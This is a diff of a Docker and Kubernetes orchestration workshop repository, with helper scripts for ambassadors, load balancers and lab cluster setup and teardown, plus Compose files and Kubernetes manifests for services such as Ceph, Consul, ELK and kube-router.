# Get all services in our compose application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
])

# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=ambassador.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "ambassador.container" }} '
                '{{ .Label "ambassador.service" }}',
])

# Build a set of existing ambassadors.
ambassadors = dict()
for ambassador in ambassadors_data.split('\n'):
    if not ambassador:
        continue
    ambassador_id, container_id, linked_service = ambassador.split()
    ambassadors[container_id, linked_service] = ambassador_id

operations = []

# Start the missing ambassadors.
for container in containers_data.split('\n'):
    if not container:
        continue
    container_id, service_name = container.split()
    extra_hosts = config.services[service_name].get("extra_hosts", {})
    for linked_service, bind_address in extra_hosts.items():
        description = "Ambassador {}/{}/{}".format(
            service_name, container_id, linked_service)
        ambassador_id = ambassadors.pop((container_id, linked_service), None)
        if ambassador_id:
            print("{} already exists: {}".format(description, ambassador_id))
        else:
            print("{} not found, creating it.".format(description))
            operations.append([
                description,
                "docker", "run", "-d",
                "--net", "container:{}".format(container_id),
                "--label", "ambassador.project={}".format(project_name),
                "--label", "ambassador.container={}".format(container_id),
                "--label", "ambassador.service={}".format(linked_service),
                "--label", "ambassador.bindaddr={}".format(bind_address),
                "jpetazzo/hamba", "run"
            ])

# Destroy extraneous ambassadors.
for ambassador_id in ambassadors.values():
    print("{} is not useful anymore, destroying it.".format(ambassador_id))
    operations.append([
        "rm -f {}".format(ambassador_id),
        "docker", "rm", "-f", ambassador_id,
    ])

# Execute all commands in parallel.
parallel_run(operations, 10)

bin/delete-ambassadors.sh (3 changes, new executable file)

@@ -0,0 +1,3 @@
#!/bin/sh
docker ps -q --filter label=ambassador.project=dockercoins |
    xargs docker rm -f

bin/fixup-yaml.sh (16 changes, new executable file)

@@ -0,0 +1,16 @@
#!/bin/sh
# Some tools will choke on the YAML files generated by PyYAML;
# in particular on a section like this one:
#
# service:
#   ports:
#   - 8000:5000
#
# This script adds two spaces in front of the dash in those files.
# Warning: it is a hack, and probably won't work on some YAML files.
[ -f "$COMPOSE_FILE" ] || {
    echo "Cannot find COMPOSE_FILE"
    exit 1
}
sed -i 's/^  -/    -/' "$COMPOSE_FILE"

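To make the before/after concrete, here is a throwaway demo (the file name is hypothetical):

```
printf 'service:\n  ports:\n  - 8000:5000\n' > /tmp/demo.yml
COMPOSE_FILE=/tmp/demo.yml sh bin/fixup-yaml.sh
cat /tmp/demo.yml    # the list item is now "    - 8000:5000"
```
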
bin/link-to-ambassadors.py (38 changes, new executable file)

@@ -0,0 +1,38 @@
#!/usr/bin/env python

from common import ComposeFile
import yaml

config = ComposeFile()

# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

def generate_local_addr():
    last_byte = 2
    while last_byte<255:
        yield "127.127.0.{}".format(last_byte)
        last_byte += 1

for service_name, service in config.services.items():
    if "links" in service:
        for link, local_addr in zip(service["links"], generate_local_addr()):
            if link not in ports:
                print("Skipping link {} in service {} "
                      "(no port mapping defined). "
                      "Your code will probably break."
                      .format(link, service_name))
                continue
            if "extra_hosts" not in service:
                service["extra_hosts"] = {}
            service["extra_hosts"][link] = local_addr
        del service["links"]
    if "ports" in service:
        del service["ports"]
    if "volumes" in service:
        del service["volumes"]
    if service_name in ports:
        service["ports"] = [ ports[service_name] ]

config.save()

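Taken together, these `bin/` scripts implement the ambassador pattern demo. A plausible end-to-end sequence (the exact ordering is an assumption; each script reads `$COMPOSE_FILE` and the labels of the running Compose app):

```
export COMPOSE_FILE=docker-compose.yml
../bin/link-to-ambassadors.py      # turn links into extra_hosts on 127.127.0.x
docker-compose up -d
../bin/create-ambassadors.py       # one hamba ambassador per (container, link)
../bin/configure-ambassadors.py    # point ambassadors at the current backends
```
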
bin/reconfigure-load-balancers.py (46 changes, new executable file)

@@ -0,0 +1,46 @@
#!/usr/bin/env python

# FIXME: hardcoded
PORT="80"

import os
import subprocess

project_name = os.path.basename(os.path.realpath("."))

# Get all existing services for this application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .Label "com.docker.compose.service" }} '
                '{{ .Label "com.docker.compose.container-number" }} '
                '{{ .Label "loadbalancer" }}',
])

load_balancers = dict()
for line in containers_data.split('\n'):
    if not line:
        continue
    service_name, container_number, load_balancer = line.split(' ')
    if load_balancer:
        if load_balancer not in load_balancers:
            load_balancers[load_balancer] = []
        load_balancers[load_balancer].append((service_name, int(container_number)))

for load_balancer, backends in load_balancers.items():
    # FIXME: iterate on all load balancers
    container_name = "{}_{}_1".format(project_name, load_balancer)
    command = [
        "docker", "run", "--rm",
        "--volumes-from", container_name,
        "--net", "container:{}".format(container_name),
        "jpetazzo/hamba", "reconfigure", PORT,
    ]
    command.extend(
        "{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
        for (backend_name, backend_number) in sorted(backends)
    )
    print("Updating configuration for {} with {} backend(s)..."
          .format(container_name, len(backends)))
    subprocess.check_output(command)

bin/setup-all-the-things.sh (201 changes, new executable file)

@@ -0,0 +1,201 @@
#!/bin/sh
unset DOCKER_REGISTRY
unset DOCKER_HOST
unset COMPOSE_FILE

SWARM_IMAGE=${SWARM_IMAGE:-swarm}

prepare_1_check_ssh_keys () {
    for N in $(seq 1 5); do
        ssh node$N true
    done
}

prepare_2_compile_swarm () {
    cd ~
    git clone git://github.com/docker/swarm
    cd swarm
    [ -z "$1" ] && {
        echo "Specify which revision to build."
        return
    }
    git checkout "$1" || return
    mkdir -p image
    docker build -t docker/swarm:$1 .
    docker run -i --entrypoint sh docker/swarm:$1 \
        -c 'cat $(which swarm)' > image/swarm
    chmod +x image/swarm
    cat >image/Dockerfile <<EOF
FROM scratch
COPY ./swarm /swarm
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
EOF
    docker build -t jpetazzo/swarm:$1 image
    docker login
    docker push jpetazzo/swarm:$1
    docker logout
    SWARM_IMAGE=jpetazzo/swarm:$1
}

clean_1_containers () {
    for N in $(seq 1 5); do
        ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
    done
}

clean_2_volumes () {
    for N in $(seq 1 5); do
        ssh node$N "docker volume ls -q | xargs -r docker volume rm"
    done
}

clean_3_images () {
    for N in $(seq 1 5); do
        ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
    done
}

clean_4_machines () {
    rm -rf ~/.docker/machine/
}

clean_all () {
    clean_1_containers
    clean_2_volumes
    clean_3_images
    clean_4_machines
}

dm_swarm () {
    eval $(docker-machine env node1 --swarm)
}
dm_node1 () {
    eval $(docker-machine env node1)
}

setup_1_swarm () {
    grep node[12345] /etc/hosts | grep -v ^127 |
    while read IPADDR NODENAME; do
        docker-machine create --driver generic \
            --engine-opt cluster-store=consul://localhost:8500 \
            --engine-opt cluster-advertise=eth0:2376 \
            --swarm --swarm-master --swarm-image $SWARM_IMAGE \
            --swarm-discovery consul://localhost:8500 \
            --swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
            --generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
    done
}

setup_2_consul () {
    IPADDR=$(ssh node1 ip a ls dev eth0 |
             sed -n 's,.*inet \(.*\)/.*,\1,p')

    for N in 1 2 3 4 5; do
        ssh node$N -- docker run -d --restart=always --name consul_node$N \
            -e CONSUL_BIND_INTERFACE=eth0 --net host consul \
            agent -server -retry-join $IPADDR -bootstrap-expect 5 \
            -ui -client 0.0.0.0
    done
}

setup_3_wait () {
    # Wait for a Swarm master
    dm_swarm
    while ! docker ps; do sleep 1; done

    # Wait for all nodes to be there
    while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
}

setup_4_registry () {
    cd ~/orchestration-workshop/registry
    dm_swarm
    docker-compose up -d
    for N in $(seq 2 5); do
        docker-compose scale frontend=$N
    done
}

setup_5_btp_dockercoins () {
    cd ~/orchestration-workshop/dockercoins
    dm_node1
    export DOCKER_REGISTRY=localhost:5000
    cp docker-compose.yml-v2 docker-compose.yml
    ~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
    export $(tail -n 1 /tmp/btp.log)
}

setup_6_add_lbs () {
    cd ~/orchestration-workshop/dockercoins
    ~/orchestration-workshop/bin/add-load-balancer-v2.py rng
    ~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
}

setup_7_consulfs () {
    dm_swarm
    docker pull jpetazzo/consulfs
    for N in $(seq 1 5); do
        ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
        ssh node$N mkdir -p ~/consul
        ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
    done
}

setup_8_syncmachine () {
    while ! mountpoint ~/consul; do
        sleep 1
    done
    cp -r ~/.docker/machine ~/consul/
    for N in $(seq 2 5); do
        ssh node$N mkdir -p ~/.docker
        ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
    done
}

setup_9_elk () {
    dm_swarm
    cd ~/orchestration-workshop/elk
    docker-compose up -d
    for N in $(seq 1 5); do
        docker-compose scale logstash=$N
    done
}

setup_all () {
    setup_1_swarm
    setup_2_consul
    setup_3_wait
    setup_4_registry
    setup_5_btp_dockercoins
    setup_6_add_lbs
    setup_7_consulfs
    setup_8_syncmachine
    dm_swarm
}


force_remove_network () {
    dm_swarm
    NET="$1"
    for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
        echo $CNAME
        docker network disconnect -f $NET $CNAME
    done
    docker network rm $NET
}

demo_1_compose_up () {
    dm_swarm
    cd ~/orchestration-workshop/dockercoins
    docker-compose up -d
}

grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function list
    echo "You should source this file, then invoke the following functions:"
    grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
}

show_swarm_primary () {
    dm_swarm
    docker info 2>/dev/null | grep -e ^Role -e ^Primary
}

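As the trailer of the script explains, it is meant to be sourced, after which the individual functions (or `setup_all`) can be invoked:

```
sh bin/setup-all-the-things.sh   # executed directly, it just lists the functions
. bin/setup-all-the-things.sh    # sourced, it defines them in your shell
setup_all
show_swarm_primary
```
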
cadvisor/docker-compose.yml (12 changes, new file)

@@ -0,0 +1,12 @@
version: "2"

services:
  cadvisor:
    image: google/cadvisor
    ports:
      - "8080:8080"
    volumes:
      - "/:/rootfs:ro"
      - "/var/run:/var/run:rw"
      - "/sys:/sys:ro"
      - "/var/lib/docker/:/var/lib/docker:ro"
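To try it (a minimal sketch, assuming Docker Compose is installed on the node):

```
cd cadvisor
docker-compose up -d
# cAdvisor's web UI is now served on port 8080 of the node.
```
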
ceph/README.md (19 changes, new file)

@@ -0,0 +1,19 @@
# Ceph on Docker

Note: this doesn't quite work yet.

The OSD containers need to be started twice (the first time, they fail
initializing; the second time is a champ).

Also, it looks like you need at least two OSD containers (or the OSD
container should have two disks/directories, whatever).

RadosGW is listening on port 8080.

The `admin` container will create a `docker` user using `radosgw-admin`.
If you run it multiple times, that's OK: further invocations are idempotent.

Last but not least: it looks like the AWS CLI uses a new signature format
that doesn't work with RadosGW. After almost two hours trying to figure
out what was wrong, I tried the S3 credentials directly with boto and
it worked immediately (I was able to create a bucket).

ceph/docker-compose.yml (53 changes, new file)

@@ -0,0 +1,53 @@
version: "2"

services:
  mon:
    image: ceph/daemon
    command: mon
    environment:
      CEPH_PUBLIC_NETWORK: 10.33.0.0/16
      MON_IP: 10.33.0.2
  osd:
    image: ceph/daemon
    command: osd_directory
    depends_on:
      - mon
    volumes_from:
      - mon
    volumes:
      - /var/lib/ceph/osd
  mds:
    image: ceph/daemon
    command: mds
    environment:
      CEPHFS_CREATE: 1
    depends_on:
      - mon
    volumes_from:
      - mon
  rgw:
    image: ceph/daemon
    command: rgw
    depends_on:
      - mon
    volumes_from:
      - mon
    environment:
      CEPH_OPTS: --verbose
  admin:
    image: ceph/daemon
    entrypoint: radosgw-admin
    depends_on:
      - mon
    volumes_from:
      - mon
    command: user create --uid=docker --display-name=docker

networks:
  default:
    ipam:
      driver: default
      config:
        - subnet: 10.33.0.0/16
          gateway: 10.33.0.1

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

@@ -1,2 +0,0 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
@@ -1,34 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
@@ -1,29 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -1,128 +0,0 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kube-router
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
@@ -1,28 +0,0 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.4.3
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.17.2
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
12
consul/docker-compose.yml
Normal file
@@ -0,0 +1,12 @@
|
||||
version: "2"
|
||||
services:
|
||||
bootstrap:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -bootstrap
|
||||
container_name: bootstrap
|
||||
server:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -join bootstrap -join server
|
||||
client:
|
||||
image: jpetazzo/consul
|
||||
command: members -rpc-addr server:8400
|
||||
@@ -1,5 +1,5 @@
|
||||
FROM ruby:alpine
|
||||
RUN apk add --update build-base curl
|
||||
RUN apk add --update build-base
|
||||
RUN gem install sinatra
|
||||
RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
|
||||
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0", port=80, threaded=False)
|
||||
app.run(host="0.0.0.0", port=80)
|
||||
|
||||
|
||||
@@ -50,7 +50,7 @@ function refresh () {
|
||||
points.push({ x: s2.now, y: speed });
|
||||
}
|
||||
$("#speed").text("~" + speed.toFixed(1) + " hashes/second");
|
||||
var msg = ("I'm attending a @docker orchestration workshop, "
|
||||
var msg = ("I'm attending the @docker workshop at #LinuxCon, "
|
||||
+ "and my #DockerCoins mining rig is crunching "
|
||||
+ speed.toFixed(1) + " hashes/second! W00T!");
|
||||
$("#tweet").attr(
|
||||
|
||||
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
9
docs/chat/index.html
Normal file
@@ -0,0 +1,9 @@
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='https://gitter.im/jpetazzo/workshop-20170508-austin'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="https://gitter.im/jpetazzo/workshop-20170508-austin">https://gitter.im/jpetazzo/workshop-20170508-austin</a>
|
||||
</body>
|
||||
</html>
|
||||
16
docs/chat/index.html.sh
Executable file
@@ -0,0 +1,16 @@
|
||||
#!/bin/sh
|
||||
LINK=https://gitter.im/jpetazzo/workshop-20170508-austin
|
||||
#LINK=https://dockercommunity.slack.com/messages/docker-mentor
|
||||
#LINK=https://usenix-lisa.slack.com/messages/docker
|
||||
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
|
||||
<html>
|
||||
<!-- Generated with index.html.sh -->
|
||||
<head>
|
||||
<meta http-equiv="refresh" content="0; URL='$LINK'" />
|
||||
</head>
|
||||
<body>
|
||||
<a href="$LINK">$LINK</a>
|
||||
</body>
|
||||
</html>
|
||||
EOF
|
||||
|
||||
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
|
Before Width: | Height: | Size: 26 KiB After Width: | Height: | Size: 26 KiB |
|
Before Width: | Height: | Size: 680 KiB After Width: | Height: | Size: 680 KiB |
|
Before Width: | Height: | Size: 137 KiB After Width: | Height: | Size: 137 KiB |
|
Before Width: | Height: | Size: 252 KiB After Width: | Height: | Size: 252 KiB |
|
Before Width: | Height: | Size: 213 KiB After Width: | Height: | Size: 213 KiB |
|
Before Width: | Height: | Size: 901 KiB After Width: | Height: | Size: 901 KiB |
|
Before Width: | Height: | Size: 575 KiB After Width: | Height: | Size: 575 KiB |
|
Before Width: | Height: | Size: 205 KiB After Width: | Height: | Size: 205 KiB |
19
docs/extract-section-titles.py
Executable file
@@ -0,0 +1,19 @@
|
||||
#!/usr/bin/env python
|
||||
"""
|
||||
Extract and print level 1 and 2 titles from workshop slides.
|
||||
"""
|
||||
|
||||
separators = [
|
||||
"---",
|
||||
"--"
|
||||
]
|
||||
|
||||
slide_count = 1
|
||||
for line in open("index.html"):
|
||||
line = line.strip()
|
||||
if line in separators:
|
||||
slide_count += 1
|
||||
if line.startswith('# '):
|
||||
print slide_count, '# #', line
|
||||
elif line.startswith('# '):
|
||||
print slide_count, line
|
||||
|
Before Width: | Height: | Size: 147 KiB After Width: | Height: | Size: 147 KiB |
|
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 145 KiB |
6473
docs/index.html
Normal file
|
Before Width: | Height: | Size: 24 KiB After Width: | Height: | Size: 24 KiB |
|
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 145 KiB |
|
Before Width: | Height: | Size: 41 KiB After Width: | Height: | Size: 41 KiB |
|
Before Width: | Height: | Size: 42 KiB After Width: | Height: | Size: 42 KiB |
|
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 18 KiB |
|
Before Width: | Height: | Size: 59 KiB After Width: | Height: | Size: 59 KiB |
|
Before Width: | Height: | Size: 48 KiB After Width: | Height: | Size: 48 KiB |
|
Before Width: | Height: | Size: 266 KiB After Width: | Height: | Size: 266 KiB |
|
Before Width: | Height: | Size: 1.2 MiB After Width: | Height: | Size: 1.2 MiB |
|
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 15 KiB |
|
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 53 KiB |
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch:2
|
||||
image: elasticsearch
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash:2
|
||||
image: logstash
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana:4
|
||||
image: kibana
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
@@ -1,21 +0,0 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
annotations:
|
||||
traefik.ingress.kubernetes.io/service-weights: |
|
||||
whatever: 90%
|
||||
whatever-new: 10%
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 80
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever-new
|
||||
servicePort: 80
|
||||
@@ -1,15 +0,0 @@
|
||||
apiVersion: apiextensions.k8s.io/v1beta1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
version: v1alpha1
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
@@ -1,35 +0,0 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
properties:
|
||||
spec:
|
||||
required:
|
||||
- taste
|
||||
properties:
|
||||
taste:
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
type: string
|
||||
additionalPrinterColumns:
|
||||
- jsonPath: .spec.taste
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
name: Taste
|
||||
type: string
|
||||
- jsonPath: .metadata.creationTimestamp
|
||||
name: Age
|
||||
type: date
|
||||
@@ -1,29 +0,0 @@
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: arabica
|
||||
spec:
|
||||
taste: strong
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: robusta
|
||||
spec:
|
||||
taste: stronger
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: liberica
|
||||
spec:
|
||||
taste: smoky
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: excelsa
|
||||
spec:
|
||||
taste: fruity
|
||||
|
||||
@@ -1,86 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
